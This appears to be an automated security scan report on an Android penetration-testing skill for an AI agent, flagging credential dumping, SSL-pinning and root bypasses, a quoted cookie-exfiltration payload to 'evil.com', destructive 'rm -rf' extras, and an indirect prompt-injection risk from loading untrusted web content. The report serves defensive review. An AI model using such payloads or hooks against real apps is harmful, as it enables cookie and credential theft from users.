android-pentest

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 1.00). This skill explicitly instructs dumping and hooking for credentials (dump_shared_prefs, frida_dump_credentials, credential_hooks.js) and its examples show tokens/passwords printed verbatim, which requires the LLM to handle and output secret values directly.

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 0.90). Most links are to reputable, official resources (Frida, OWASP, Android, GitHub) and are low-risk, but the inclusion of an untrusted, non-HTTPS "http://evil.com/?c=" endpoint is a clear high-risk indicator that could be used to distribute malware, so the overall set should be treated as suspicious.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 0.95). The package is a dual‑use Android pentest toolkit that includes multiple explicit malicious-capability patterns (universal SSL‑pinning and root bypasses, Frida hooks that dump credentials/crypto/keystore material, automated data extraction/pulling of app databases/files, payloads that exfiltrate to attacker domains and destructive intent extras like "rm -rf", and tools to install system CA certificates/persistent Frida gadgets) — features that enable credential theft, data exfiltration, stealthy bypasses and backdoor-like access if used without authorization.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The skill's required workflows in SKILL.md (e.g., Quick Start, Workflow 4 Deep Link/Intent Testing and multiple WebView/deep-link examples) explicitly launch activities and WebViews that load external URLs (for example "javascript:document.location='http://evil.com/?c='+document.cookie" and data:text/html payloads), which means the agent fetches and ingests untrusted public web content as part of its runtime testing and could have that content influence subsequent analysis/actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 0.90). The skill's MCP configuration instructs runtime execution via "npx -y @anthropic/mobile-mcp --android" and explicitly references the Mobile MCP repo (https://github.com/mobile-next/mobile-mcp), which means remote code would be fetched and executed at runtime and is a required dependency for the Mobile MCP device interactions.